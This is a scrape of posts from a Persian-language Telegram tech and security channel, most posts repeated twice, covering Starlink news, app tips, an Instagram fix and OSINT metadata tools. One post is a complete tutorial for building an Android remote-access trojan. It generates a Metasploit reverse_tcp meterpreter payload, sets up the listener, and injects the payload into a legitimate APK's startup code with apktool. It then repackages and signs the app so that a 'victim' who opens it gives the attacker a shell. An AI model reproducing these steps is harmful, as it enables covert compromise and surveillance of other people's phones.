🔴ایجاد انقلاب بزرگ در اینترنت موبایل / اینترنت ماهوارهای استارلینک در دسترس کاربران موبایل قرار میگیرد
🔹طبق اسنادی که در FCC به ثبت رسیده، اسپیس ایکس قصد دارد اینترنت ماهوارهای استارلینک را در دسترس گوشیهای موبایل اندرویدی و iOS قرار داده و فرکانس 2 گیگاهرتزی را به مجوز استارلینک خود اضافه کند.
🔹اضافه کردن فرکانس 2 گیگاهرتزی به سرویس استارلینک به این معنی است که سیگنالهای آن کمتر تحت تاثیر موانع فیزیکی قرار میگیرند تا برای دستگاههای کوچکتر مانند گوشیهای هوشمند مناسب باشند. اسپیس ایکس در پرونده خود توضیح میدهد که این کار به نفع تمام مشترکین این سرویس در آمریکا خواهد بود.
🔹 به این ترتیب کشورهایی که در اینترنت اختلال ایجاد می کنند بزودی با مشکلی بدون راه حل مواجه شده و کاربران اینترنت در سراسر جهان دسترسی به اینترنت آزاد را تجربه خواهند کرد.
🔹هنوز در مورد هزینه این اینترنت خبری منتشر نشده است.
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
🔹طبق اسنادی که در FCC به ثبت رسیده، اسپیس ایکس قصد دارد اینترنت ماهوارهای استارلینک را در دسترس گوشیهای موبایل اندرویدی و iOS قرار داده و فرکانس 2 گیگاهرتزی را به مجوز استارلینک خود اضافه کند.
🔹اضافه کردن فرکانس 2 گیگاهرتزی به سرویس استارلینک به این معنی است که سیگنالهای آن کمتر تحت تاثیر موانع فیزیکی قرار میگیرند تا برای دستگاههای کوچکتر مانند گوشیهای هوشمند مناسب باشند. اسپیس ایکس در پرونده خود توضیح میدهد که این کار به نفع تمام مشترکین این سرویس در آمریکا خواهد بود.
🔹 به این ترتیب کشورهایی که در اینترنت اختلال ایجاد می کنند بزودی با مشکلی بدون راه حل مواجه شده و کاربران اینترنت در سراسر جهان دسترسی به اینترنت آزاد را تجربه خواهند کرد.
🔹هنوز در مورد هزینه این اینترنت خبری منتشر نشده است.
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
👍35👎3👏3👌1
♨️ چه فونتیه؟!
🌀 خیلی وقتا شده وارد یک صفحه وب شدیم و اسم فونتی که اون سایت استفاده کرده برامون جالب بوده ، تو این آموزش قراره بگیم چطور میشه اسم فونت صفحه وب رو پیدا کرد ...
🔹راه حل اول :
استفاده از قابلیت inspect مرورگرها هست .
در این روش کلیدهای ctrl+shift+c رو با هم فشار میدیم و سپس هر جایی که نشانگر موس قرار بگیره ، فونت و استایل های متن قابل مشاهده هستن :)
🔹راه حل دوم :
استفاده از افزونه ی WhatFont کروم هستش که بعد از نصب این افزونه وارد هر صفحه وبی که بشید و نشانگر موس رو روی المان قرار بدید ، اسم فونت بصورت tooltip براتون به نمایش در میاد 👌
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
🌀 خیلی وقتا شده وارد یک صفحه وب شدیم و اسم فونتی که اون سایت استفاده کرده برامون جالب بوده ، تو این آموزش قراره بگیم چطور میشه اسم فونت صفحه وب رو پیدا کرد ...
🔹راه حل اول :
استفاده از قابلیت inspect مرورگرها هست .
در این روش کلیدهای ctrl+shift+c رو با هم فشار میدیم و سپس هر جایی که نشانگر موس قرار بگیره ، فونت و استایل های متن قابل مشاهده هستن :)
🔹راه حل دوم :
استفاده از افزونه ی WhatFont کروم هستش که بعد از نصب این افزونه وارد هر صفحه وبی که بشید و نشانگر موس رو روی المان قرار بدید ، اسم فونت بصورت tooltip براتون به نمایش در میاد 👌
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
👍19👎2❤1😱1
Forwarded from ——
final_version_4.3.6.rar
9 MB
pass : redteam_channel_z
کتاب پر حاشیه سکیوریتی پلاس نسخه اصلی به همراه خلاصه نویسی و ترجمه(درک مطلب)
کتاب پر حاشیه سکیوریتی پلاس نسخه اصلی به همراه خلاصه نویسی و ترجمه(درک مطلب)
👍11👎1
✅ معرفی اپلیکیشن Mintal
🔸با استفاده از این اپلکیشن میتونید عکسای بی کیفتتون رو با کیفیت کنید، فقط کافیه اپلیکشن رو نصب کنید و طبق مراحل بالا عمل کنید.
📲 نسخه اندروید
➖➖➖➖➖➖➖➖➖
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
🔸با استفاده از این اپلکیشن میتونید عکسای بی کیفتتون رو با کیفیت کنید، فقط کافیه اپلیکشن رو نصب کنید و طبق مراحل بالا عمل کنید.
📲 نسخه اندروید
➖➖➖➖➖➖➖➖➖
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
👍8👎2
📡فیس بوک شبیه تیکتاک میشود
◽️شرکت مِتا پلتفرمز در نحوه نمایش پستها و ویدیوها در فیسبوک تغییراتی میدهد تا این شبکه اجتماعی بهتر بتواند با اپلیکیشن ویدیویی تیک تاک رقابت کند.
+ این درحالیست که یکی از اعضای فدرال آمریکا اخیرا اعلام کرده بود تا اپلیکیشن چینی"تیک تاک" باید از فروشگاه پلی و اپ استور حذف شود...
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
◽️شرکت مِتا پلتفرمز در نحوه نمایش پستها و ویدیوها در فیسبوک تغییراتی میدهد تا این شبکه اجتماعی بهتر بتواند با اپلیکیشن ویدیویی تیک تاک رقابت کند.
+ این درحالیست که یکی از اعضای فدرال آمریکا اخیرا اعلام کرده بود تا اپلیکیشن چینی"تیک تاک" باید از فروشگاه پلی و اپ استور حذف شود...
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
👍23👎10🤔1
ساخت رات و پنهان سازی ان در APK
خب نرم افزارایی که نیاز داریم :
1-metasploit framework
2-apktool 2.1.1 (recommended)
3-signapk
نوبت به ساخت رات میرسه :
1- ترمینال را باز کرده
2-دستور زیر را وارد کنید :
msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[your port] R>[mahal zakhire]\rat.apk
خب حالا باید متاسپلویت رو راه بندازیم بر اساس این کانفیگ ها:
ترمینالی جدید ایجاد کرده و دستورات زیر را وارد کنید:
1-msfconsole
2-use multi/handler
3-set LHOST [your ip]
4- set LPORT [your port]
5-set PAYLOAD android/meterpreter/reverse_tcp
6-exploit
اینم از متاسپلویت
خبحالا نوبت بایند کردن میرسه
اول از همه باید rat و فایل apk عادی رو deassemble کنیم:
ترمینالی جدید باز کرده و این دستورات رو بزنین :
1- apktool d [mahal rat]\rat.apk -o [mahal folder zakhire sazi]\rat
2-apktool d [mahal apk]\ye chizi.apk -o [mahal zakhire sazi apk]\ye chizi
خب الان هر 2 دی اسمبل شدن
کار بعدی :
1- در فولدری که حاوی محتوای دی اسمبل شده ی رات هست وارد شوید و به smali رفته و com را باز کنید و فولدر متاسپلویت رو کپی کنید
و بعد به فولدر حاوی محتوای دی اسمبل شده ی apk عادی رفته و smali را باز کردی و در داخل فولدر com paste کنید
2-فولدر apk عادی رو باز کنید( حاوی دی اسمبل) و androidmainfest.xml را با notepad++ باز کنید و به دنبال android.intent.action.main بگردید و داخل activity که ان را پوشش می دهد به دنبال android:name بگردید و چیزی که جلوی ان و بین دو " قرار گرفته را یه جا ذخیره کنید.
متنی که بین دو " بود همچین شکلی دارد : felan.bahman.bisar.yechizi
خب شما باید در smali بدنبال فولدر felan و بعد داخل ان به دنبال bahman و بعد دوباره داخل ان بدنبال bisar و وقتی به یکی مونده به اخریش رسیدید yechizi.smali رو باید با notepad++ باز کنید
خب حالا در yechizi.smali باید به دنبال:
onCreate(Landroid/os/BundleV
بگردید و زیر ان این را کپی کنید:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/ContextV
خب حالا باید همون androidMainfest.xml (برای apk عادی) رو باز کنیم و androidMainfest.xml برای رات رو هم از درون فولدرش باز کنیم و از داخل androidMainfest.xml برای رات همه تگ های user-permission رو
کپی در androidMainfest.xml نرم افزار عادی بکنیم.
همه چیز رو سیو می کنیم و نوبت میرسه به assemble کردن
وارد ترمینال میشیم و دستور زیر رو می نویسیم:
apktool b [folderi ke narm afzar adi bood] -o [ye makani]\bindedrat.apk
خب الان اینتر رو می زنیم و منتظر میشیم که assemble کنه
زمانی که اسمبل کرد اخرین مرحله است که باید با signapk برنامه رو sign کنیم
دستور sign کردن :
java -jar signapk.jar [file daraye .pem] [file key] [makan apk sign nashode]\bindedrat.apk [makan delkhah]\signeddbindedrat.apk
خب اینم از امضا شده شد حالا اگه قربانی باز بکنه اینو ، باید ترمینالی که در ان metasploit رو بارگذاری کردیم مشاهده کنیم و برای ما shell درست می کند
@SecComputer
خب نرم افزارایی که نیاز داریم :
1-metasploit framework
2-apktool 2.1.1 (recommended)
3-signapk
نوبت به ساخت رات میرسه :
1- ترمینال را باز کرده
2-دستور زیر را وارد کنید :
msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[your port] R>[mahal zakhire]\rat.apk
خب حالا باید متاسپلویت رو راه بندازیم بر اساس این کانفیگ ها:
ترمینالی جدید ایجاد کرده و دستورات زیر را وارد کنید:
1-msfconsole
2-use multi/handler
3-set LHOST [your ip]
4- set LPORT [your port]
5-set PAYLOAD android/meterpreter/reverse_tcp
6-exploit
اینم از متاسپلویت
خبحالا نوبت بایند کردن میرسه
اول از همه باید rat و فایل apk عادی رو deassemble کنیم:
ترمینالی جدید باز کرده و این دستورات رو بزنین :
1- apktool d [mahal rat]\rat.apk -o [mahal folder zakhire sazi]\rat
2-apktool d [mahal apk]\ye chizi.apk -o [mahal zakhire sazi apk]\ye chizi
خب الان هر 2 دی اسمبل شدن
کار بعدی :
1- در فولدری که حاوی محتوای دی اسمبل شده ی رات هست وارد شوید و به smali رفته و com را باز کنید و فولدر متاسپلویت رو کپی کنید
و بعد به فولدر حاوی محتوای دی اسمبل شده ی apk عادی رفته و smali را باز کردی و در داخل فولدر com paste کنید
2-فولدر apk عادی رو باز کنید( حاوی دی اسمبل) و androidmainfest.xml را با notepad++ باز کنید و به دنبال android.intent.action.main بگردید و داخل activity که ان را پوشش می دهد به دنبال android:name بگردید و چیزی که جلوی ان و بین دو " قرار گرفته را یه جا ذخیره کنید.
متنی که بین دو " بود همچین شکلی دارد : felan.bahman.bisar.yechizi
خب شما باید در smali بدنبال فولدر felan و بعد داخل ان به دنبال bahman و بعد دوباره داخل ان بدنبال bisar و وقتی به یکی مونده به اخریش رسیدید yechizi.smali رو باید با notepad++ باز کنید
خب حالا در yechizi.smali باید به دنبال:
onCreate(Landroid/os/BundleV
بگردید و زیر ان این را کپی کنید:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/ContextV
خب حالا باید همون androidMainfest.xml (برای apk عادی) رو باز کنیم و androidMainfest.xml برای رات رو هم از درون فولدرش باز کنیم و از داخل androidMainfest.xml برای رات همه تگ های user-permission رو
کپی در androidMainfest.xml نرم افزار عادی بکنیم.
همه چیز رو سیو می کنیم و نوبت میرسه به assemble کردن
وارد ترمینال میشیم و دستور زیر رو می نویسیم:
apktool b [folderi ke narm afzar adi bood] -o [ye makani]\bindedrat.apk
خب الان اینتر رو می زنیم و منتظر میشیم که assemble کنه
زمانی که اسمبل کرد اخرین مرحله است که باید با signapk برنامه رو sign کنیم
دستور sign کردن :
java -jar signapk.jar [file daraye .pem] [file key] [makan apk sign nashode]\bindedrat.apk [makan delkhah]\signeddbindedrat.apk
خب اینم از امضا شده شد حالا اگه قربانی باز بکنه اینو ، باید ترمینالی که در ان metasploit رو بارگذاری کردیم مشاهده کنیم و برای ما shell درست می کند
@SecComputer
👍18❤3
حل مشکل سفید شدن صفحه اینستاگرام
1⃣ آخرین نسخه اینستاگرامو نصب کنید
2⃣ زبان گوشیو به انگلیسی تغییر بدید
3⃣ به فیلتر شکن قوی متصل بشید
حالا برنامه اینستاگرام را اجرا کنید.
دلیل صفحه سفید چیه؟!
این صفحه برای انتخاب زبان هست و چون از سمت سرور های فیسبوک هست و در ایران فیسبوک فیلتر هست بالا نمیاد.
🆔@SecComputer
#GP:@ITSecgp
1⃣ آخرین نسخه اینستاگرامو نصب کنید
2⃣ زبان گوشیو به انگلیسی تغییر بدید
3⃣ به فیلتر شکن قوی متصل بشید
حالا برنامه اینستاگرام را اجرا کنید.
دلیل صفحه سفید چیه؟!
این صفحه برای انتخاب زبان هست و چون از سمت سرور های فیسبوک هست و در ایران فیسبوک فیلتر هست بالا نمیاد.
🆔@SecComputer
#GP:@ITSecgp
👍19
This media is not supported in your browser
VIEW IN TELEGRAM
حوضچه فیبر نوری منطقه ۸ مخابرات تهران اتیش گرفته و اینترنت و شبکه موبایل مملکت رفته رو هوا!
🆔@SecComputer
#GP:@ITSecgp
🆔@SecComputer
#GP:@ITSecgp
😁33🤬20👎7👍6
CrookCatcher
برنامهای است که هر بار که شخصی رمز یا الگوی اشتباهی را وارد میکند، بهطور محتاطانه با دوربین جلوی اندروید عکس میگیرد.
عکس به همراه موقعیت مکانی دستگاه بلافاصله به ایمیل شما ارسال می شود. این اپلیکیشن در صورت سرقت گوشی هوشمند شما بسیار کاربردی است.
#برنامه #اندروید
@SecComputer
برنامهای است که هر بار که شخصی رمز یا الگوی اشتباهی را وارد میکند، بهطور محتاطانه با دوربین جلوی اندروید عکس میگیرد.
عکس به همراه موقعیت مکانی دستگاه بلافاصله به ایمیل شما ارسال می شود. این اپلیکیشن در صورت سرقت گوشی هوشمند شما بسیار کاربردی است.
#برنامه #اندروید
@SecComputer
Google Play
CrookCatcher • Anti-Theft - Apps on Google Play
Protect your phone — get thief photos, videos & location straight to your inbox.
👍18❤2
دریافت فراداده از عکس ها (تعمیرات مختلف عکسبرداری و دوربین):
├FBMD (Facebook metadata)
├Metapicz
├Metadata2go
├exif-viewer
├Exiftool
├Regex
├Exifdata
├Jimpl
└Pic2Map
#OSINT #METADATA
@SecComputer
├FBMD (Facebook metadata)
├Metapicz
├Metadata2go
├exif-viewer
├Exiftool
├Regex
├Exifdata
├Jimpl
└Pic2Map
#OSINT #METADATA
@SecComputer
metadata2go.com
Check files for metadata info
This online metadata viewer will show you all hidden metadata info of audio, video, document, ebook & image files. Online exif data viewer without installation!
👍7